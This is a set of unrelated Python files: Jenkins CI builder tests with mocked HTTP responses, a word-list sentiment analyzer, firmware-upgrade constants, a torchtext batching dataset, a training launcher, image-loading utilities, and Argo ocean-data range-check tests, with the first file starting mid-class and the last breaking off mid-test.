def test_pick_master_with_blacklist(self):
redis.sadd(MASTER_BLACKLIST_KEY, 'http://jenkins.example.com')
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
assert 'http://jenkins-2.example.com' == builder._pick_master('job1')
@responses.activate
def test_jobstep_replacement(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.create_job(job)
failstep = job.phases[0].steps[0]
failstep.result = Result.infra_failed
failstep.status = Status.finished
db.session.add(failstep)
db.session.commit()
replacement_step = builder.create_job(job, replaces=failstep)
# new jobstep should still be part of same job/phase
assert replacement_step.job == job
assert replacement_step.phase == failstep.phase
# make sure .steps actually includes the new jobstep
assert len(failstep.phase.steps) == 2
# make sure replacement id is correctly set
assert failstep.replacement_id == replacement_step.id
assert replacement_step.data == {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'uri': None,
'master': 'http://jenkins.example.com',
}
class CancelStepTest(BaseTestCase):
@responses.activate
def test_queued(self):
responses.add(
responses.POST, 'http://jenkins.example.com/queue/cancelItem?id=13',
match_querystring=True, status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'item_id': 13,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.queued)
builder = self.get_builder()
builder.cancel_step(step)
assert step.result == Result.aborted
assert step.status == Status.finished
@responses.activate
def test_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/stop/',
body='', status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.in_progress)
builder = self.get_builder()
builder.cancel_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_timeouts_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
# The job is not yet complete after this sync step so no logs yet.
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source is None
step.data['timed_out'] = True
builder.cancel_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == JENKINS_LOG_NAME
assert source.project == self.project
assert source.date_created == step.date_started
assert step.data.get('log_offset') == 7
bucket_name = step.id.hex + '-jenkins'
artifact_name = step.data['log_artifact_name']
artifact = ArtifactStoreMock('').get_artifact(bucket_name, artifact_name)
assert artifact.name == artifact_name
assert artifact.path == JENKINS_LOG_NAME
assert artifact.size == 7
assert artifact.state == ArtifactState.UPLOADED
assert ArtifactStoreMock('').get_artifact_content(bucket_name, artifact_name).getvalue() == 'Foo bar'
class SyncStepTest(BaseTestCase):
@responses.activate
def test_waiting_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_pending.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.queued
@responses.activate
def test_cancelled_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_cancelled.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_queued_to_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_success_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.passed
assert step.date_finished is not None
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_failed_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.failed
assert step.date_finished is not None
def test_present_manifest(self):
build = self.create_build(self.project)
job = self.create_job(build=build)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
artifacts = [self.create_artifact(step, 'manifest.json')]
builder = self.get_builder()
builder.verify_final_artifacts(step, artifacts)
assert not FailureReason.query.filter(
FailureReason.step_id == step.id
).first()
def test_missing_manifest_result(self):
build = self.create_build(self.project)
job = self.create_job(build=build)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, status=Status.finished)
builder = self.get_builder()
builder.verify_final_artifacts(step, [])
assert FailureReason.query.filter(
FailureReason.step_id == step.id,
FailureReason.reason == 'missing_manifest_json'
).first()
assert step.result == Result.infra_failed
@responses.activate
@mock.patch('changes.backends.jenkins.builder.time')
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
def test_result_slow_log(self, mock_time):
mock_time.time.return_value = time.time()
def log_text_callback(request):
# Zoom 10 minutes into the future; this should cause the console
# downloading code to bail
mock_time.time.return_value += 10 * 60
data = "log\n" * 10000
return (200, {'X-Text-Size': str(len(data))}, data)
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add_callback(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
callback=log_text_callback)
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert len(step.logsources) == 1
bucket_name = step.id.hex + '-jenkins'
artifact_name = step.data['log_artifact_name']
assert "LOG TRUNCATED" in ArtifactStoreMock('').\
get_artifact_content(bucket_name, artifact_name).getvalue()
class SyncGenericResultsTest(BaseTestCase):
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_does_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == JENKINS_LOG_NAME
assert source.project == self.project
assert source.date_created == step.date_started
assert step.data.get('log_offset') == 7
bucket_name = step.id.hex + '-jenkins'
artifact_name = step.data['log_artifact_name']
artifact = ArtifactStoreMock('').get_artifact(bucket_name, artifact_name)
assert artifact.name == artifact_name
assert artifact.path == JENKINS_LOG_NAME
assert artifact.size == 7
assert artifact.state == ArtifactState.UPLOADED
assert ArtifactStoreMock('').get_artifact_content(bucket_name, artifact_name).getvalue() == 'Foo bar'
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_does_save_artifacts(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_with_artifacts.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
expected_artifacts_data = dict()
expected_artifacts_data['foobar.log'] = {
"displayPath": "foobar.log",
"fileName": "foobar.log",
"relativePath": "artifacts/foobar.log",
}
expected_artifacts_data['foo/tests.xml'] = {
"displayPath": "tests.xml",
"fileName": "tests.xml",
"relativePath": "artifacts/foo/tests.xml",
}
expected_artifacts_data['tests.xml'] = {
"displayPath": "tests.xml",
"fileName": "tests.xml",
"relativePath": "artifacts/tests.xml",
}
for name, data in expected_artifacts_data.items():
artifact = Artifact.query.filter(
Artifact.name == name,
Artifact.step == step,
).first()
assert artifact.data == data
class ArtifactsManagerMatchTest(BaseTestCase):
def test_standard(self):
builder = self.get_builder()
mgr = builder.get_artifact_manager(mock.Mock())
assert not mgr.can_process('build_report.log')
def test_fetch_jenkins(self):
builder = self.get_builder(debug_config={'fetch_jenkins_logs': True})
mgr = builder.get_artifact_manager(mock.Mock())
assert mgr.can_process('build_report.log')
class SyncArtifactTest(BaseTestCase):
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_artifact_xunit(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_list = list(TestCase.query.filter(
TestCase.job_id == job.id
))
assert len(test_list) == 3
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_artifact_coverage(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/coverage.xml',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='coverage.xml', data={
"displayPath": "coverage.xml",
"fileName": "coverage.xml",
"relativePath": "artifacts/coverage.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
cover_list = list(FileCoverage.query.filter(
FileCoverage.job_id == job.id
))
assert len(cover_list) == 2
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_artifact_file(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/foo.bar',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='foo.bar', data={
"displayPath": "foo.bar",
"fileName": "foo.bar",
"relativePath": "artifacts/foo.bar"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
class SyncTestArtifactsTest(BaseTestCase):
@responses.activate
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.models.testresult.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.storage.artifactstore.ArtifactStoreClient', ArtifactStoreMock)
def test_sync_testartifacts(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT_TESTARTIFACTS,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_artifacts = list(TestArtifact.query)
test = TestCase.query.first()
assert len(test_artifacts) == 1
test_artifact = test_artifacts[0]
assert test_artifact.file.get_file().read() == "sample_content"
assert test_artifact.name == "sample_name.txt"
assert str(test_artifact.type) == "Text"
assert test_artifact.test == test
class JenkinsIntegrationTest(BaseTestCase):
"""
This test should ensure a full cycle of tasks completes successfully within
the jenkins builder space.
"""
# it's possible for this test to infinitely hang due to continuous polling,
# so let's ensure we set a timeout
@pytest.mark.timeout(5)
@mock.patch('changes.config.redis.lock', mock.MagicMock())
@mock.patch('changes.backends.jenkins.builder.ArtifactStoreClient', ArtifactStoreMock)
@mock.patch('changes.jobs.sync_job_step.ArtifactStoreClient', ArtifactStoreMock)
@eager_tasks
@responses.activate
def test_full(self):
from changes.jobs.create_job import create_job
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
# TODO: move this out of this file and integrate w/ buildstep
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'))
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
artifacts_store_requests_re = re.compile(r'http://localhost:1234/buckets/.+/artifacts')
# Simulate test type which doesn't interact with artifacts store.
responses.add(
responses.GET, artifacts_store_requests_re,
body='',
status=404)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
plan = self.create_plan(self.project)
self.create_step(
plan, order=0, implementation='changes.backends.jenkins.buildstep.JenkinsBuildStep', data={
'job_name': 'server',
'jenkins_url': 'http://jenkins.example.com',
},
)
self.create_job_plan(job, plan)
job_id = job.id.hex
build_id = build.id.hex
create_job.delay(
job_id=job_id,
task_id=job_id,
parent_task_id=build_id,
)
job = Job.query.get(job_id)
assert job.status == Status.finished
assert job.result == Result.passed
assert job.date_created
assert job.date_started
assert job.date_finished
phase_list = job.phases
assert len(phase_list) == 1
assert phase_list[0].status == Status.finished
assert phase_list[0].result == Result.passed
assert phase_list[0].date_created
assert phase_list[0].date_started
assert phase_list[0].date_finished
step_list = phase_list[0].steps
assert len(step_list) == 1
assert step_list[0].status == Status.finished
assert step_list[0].result == Result.passed
assert step_list[0].date_created
assert step_list[0].date_started
assert step_list[0].date_finished
assert step_list[0].data == {
'item_id': '13',
'queued': False,
'log_offset': 7,
'log_artifact_name': JENKINS_LOG_NAME,
'jenkins_bucket_name': step_list[0].id.hex + '-jenkins',
'job_name': 'server',
'build_no': 2,
'uri': 'https://jenkins.build.itc.dropbox.com/job/server/2/',
'master': 'http://jenkins.example.com',
}
node = step_list[0].node
assert node.label == 'server-ubuntu-10.04 (ami-746cf244) (i-836023b7)'
assert [n.label for n in node.clusters] == ['server-runner']
source = LogSource.query.filter_by(job=job).first()
assert source.name == JENKINS_LOG_NAME
assert source.step == step_list[0]
assert source.project == self.project
assert source.date_created == job.date_started
bucket_name = step_list[0].id.hex + '-jenkins'
artifact_name = step_list[0].data['log_artifact_name']
artifact = ArtifactStoreMock('').get_artifact(bucket_name, artifact_name)
assert artifact.name == artifact_name
assert artifact.path == JENKINS_LOG_NAME
assert artifact.size == 7
assert artifact.state == ArtifactState.UPLOADED
assert ArtifactStoreMock('').get_artifact_content(bucket_name, artifact_name).getvalue() == 'Foo bar'
|
142695
|
import nltk
class Analyzer():
"""Implements sentiment analysis."""
def __init__(self, positives, negatives):
"""Initialize Analyzer."""
self.negatives = []
self.positives = []
with open ("negative-words.txt") as negative:
for line in negative:
if not line.startswith((" ", ";")):
self.negatives.extend(line.split())
with open ("positive-words.txt") as positive:
for line in positive:
if not line.startswith((" ", ";")):
self.positives.extend(line.split())
# TODO
def analyze(self, text):
"""Analyze text for sentiment, returning its score."""
tokenizer = nltk.tokenize.TweetTokenizer()
tokens = tokenizer.tokenize(text)
score = 0
for token in tokens:
if token in self.negatives:
score -= 1
elif token in self.positives:
score += 1
# TODO
return score
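# --- Usage sketch (illustration only, not part of the original file) ---
# Assuming the positive/negative word-list files are available on disk under
# these (hypothetical) names, the analyzer could be used like this:
if __name__ == '__main__':
    analyzer = Analyzer('positive-words.txt', 'negative-words.txt')
    print(analyzer.analyze('This library is great, no complaints at all'))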
|
142709
|
class UPGRADE_EVENT:
'''
Event type of Device Message Center
'''
FIRST_PACKET = 'first_packet'
BEFORE_WRITE = 'before_write'
AFTER_WRITE = 'after_write'
BEFORE_COMMAND = 'before_command'
AFTER_COMMAND = 'after_command'
FINISH = 'finish'
ERROR = 'error'
PROGRESS = 'progress'
class UPGRADE_GROUP:
FIRMWARE = 'firmware'
BEFORE_ALL = 'before_all'
AFTER_ALL = 'after_all'
from .firmware_worker import FirmwareUpgradeWorker
from .ethernet_sdk_9100_worker import SDKUpgradeWorker as EthernetSDK9100UpgradeWorker
from .sdk_8100_worker import SDKUpgradeWorker as SDK8100UpgradeWorker
from .sdk_9100_worker import SDKUpgradeWorker as SDK9100UpgradeWorker
from .jump_application_worker import JumpApplicationWorker
from .jump_bootloader_worker import JumpBootloaderWorker
|
142711
|
import torch
from torchtext.datasets import DATASETS
class BatchTextClassificationData(torch.utils.data.IterableDataset):
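    """Iterable dataset wrapping a torchtext classification dataset; iterating
    yields the raw examples in lists of up to `batch_size` items."""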
def __init__(self, dataset_name, batch_size=16):
super(BatchTextClassificationData, self).__init__()
self._iterator = DATASETS[dataset_name](split='train')
self.batch_size = batch_size
def __iter__(self):
_data = []
for i, item in enumerate(self._iterator):
_data.append(item)
if len(_data) >= self.batch_size:
yield _data
_data = []
if len(_data) > 0:
yield _data
|
142730
|
import os
import sys
import argparse
import importlib
import multiprocessing
import cv2 as cv
import torch.backends.cudnn
env_path = os.path.join(os.path.dirname(__file__), '..')
if env_path not in sys.path:
sys.path.append(env_path)
import ltr.admin.settings as ws_settings
def run_training(train_module, train_name, cudnn_benchmark=True):
"""Run a train scripts in train_settings.
args:
train_module: Name of module in the "train_settings/" folder.
train_name: Name of the train settings file.
cudnn_benchmark: Use cudnn benchmark or not (default is True).
"""
# This is needed to avoid strange crashes related to opencv
cv.setNumThreads(0)
torch.backends.cudnn.benchmark = cudnn_benchmark
print('Training: {} {}'.format(train_module, train_name))
settings = ws_settings.Settings()
if settings.env.workspace_dir == '':
raise Exception('Setup your workspace_dir in "ltr/admin/local.py".')
settings.module_name = train_module
settings.script_name = train_name
settings.project_path = 'ltr/{}/{}'.format(train_module, train_name)
expr_module = importlib.import_module('ltr.train_settings.{}.{}'.format(train_module, train_name))
expr_func = getattr(expr_module, 'run')
expr_func(settings)
def main():
    parser = argparse.ArgumentParser(description='Run a training script from train_settings.')
parser.add_argument('train_module', type=str, help='Name of module in the "train_settings/" folder.')
parser.add_argument('train_name', type=str, help='Name of the train settings file.')
    # Note: argparse's type=bool treats any non-empty string as True, so parse the 0/1 flag explicitly.
    parser.add_argument('--cudnn_benchmark', type=lambda s: bool(int(s)), default=True, help='Set cudnn benchmark on (1) or off (0) (default is on).')
args = parser.parse_args()
run_training(args.train_module, args.train_name, args.cudnn_benchmark)
if __name__ == '__main__':
multiprocessing.set_start_method('spawn', force=True)
main()
|
142733
|
import numpy as np
import requests
from io import BytesIO
from pathlib import Path
from PIL import Image
from urllib.parse import urlparse
# Use a Chrome-based user agent to avoid getting needlessly blocked.
USER_AGENT = (
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/51.0.2704.103 Safari/537.36'
)
def open_image(uri):
"""Opens and returns image at `uri`.
Always returns a HxWxC `np.array` containing the image, ready to be
consumed by any Terran algorithm. If the image is grayscale or has an alpha
channel, it'll get converted into `RGB`, so the number of channels will
always be 3.
Parameters
----------
uri : str or pathlib.Path
URI pointing to an image, which may be a filesystem location or a URL.
Returns
-------
numpy.ndarray
Array of size HxWxC containing the pixel values for the image, as
numpy.uint8.
"""
# Check if `uri` is a URL or a filesystem location.
if isinstance(uri, Path):
image = Image.open(uri)
elif urlparse(uri).scheme:
response = requests.get(uri, headers={'User-Agent': USER_AGENT})
image = Image.open(BytesIO(response.content))
else:
image = Image.open(Path(uri).expanduser())
image = np.asarray(image.convert('RGB'))
if len(image.shape) == 2:
# Grayscale image, turn it to a rank-3 tensor anyways.
image = np.stack([image] * 3, axis=-1)
return image
def resolve_images(path, batch_size=None):
"""Collects the paths of all images under `path`, yielding them in batches.
Ensures that the image is valid before returning it by attempting to open
it with PIL.
Parameters
----------
path : str or pathlib.Path
Path to recursively search for images in.
Yields
------
pathlib.Path or [pathlib.Path]
Path to every valid image found under `path`. If `batch_size` is
`None`, will return a single `pathlib.Path`. Otherwise, returns a list.
"""
if not isinstance(path, Path):
path = Path(path).expanduser()
batch = []
for f in path.glob('**/*'):
if not f.is_file():
continue
try:
Image.open(f).verify()
except OSError:
continue
# If no `batch_size` specified, just return the path.
if batch_size is None:
yield path.joinpath(f)
continue
batch.append(path.joinpath(f))
        if len(batch) >= batch_size:
            yield batch
            batch = []
    # Yield any remaining paths once the walk finishes, so the final partial
    # batch isn't silently dropped.
    if batch:
        yield batch
|
142747
|
import qctests.Argo_global_range_check
import util.testingProfile
import numpy
from util import obs_utils
##### Argo_global_range_check ---------------------------------------------------
def test_Argo_global_range_check_temperature():
'''
Make sure AGRC is flagging temperature excursions
'''
# should fail despite rounding
p = util.testingProfile.fakeProfile([-2.500000001], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
truth[0] = True
assert numpy.array_equal(qc, truth), 'failed to flag temperature slightly colder than -2.5 C'
# -2.5 OK
p = util.testingProfile.fakeProfile([-2.5], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
assert numpy.array_equal(qc, truth), 'incorrectly flagging -2.5 C'
# 40 OK
p = util.testingProfile.fakeProfile([40], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
assert numpy.array_equal(qc, truth), 'incorrectly flagging 40 C'
# should fail despite rounding
p = util.testingProfile.fakeProfile([40.0000001], [100], latitude=0.0)
qc = qctests.Argo_global_range_check.test(p, None)
truth = numpy.zeros(1, dtype=bool)
truth[0] = True
assert numpy.array_equal(qc, truth), 'failed to flag temperature slightly warmer than 40 C'
def test_Argo_global_range_check_pressure():
'''
Make sure AGRC is flagging pressure excursions
'''
# should fail despite rounding
p = util.testingProfile.fakeProfile([5], obs_utils.pressure_to_depth([-5.00000001], 0.0), latitude=0.0)
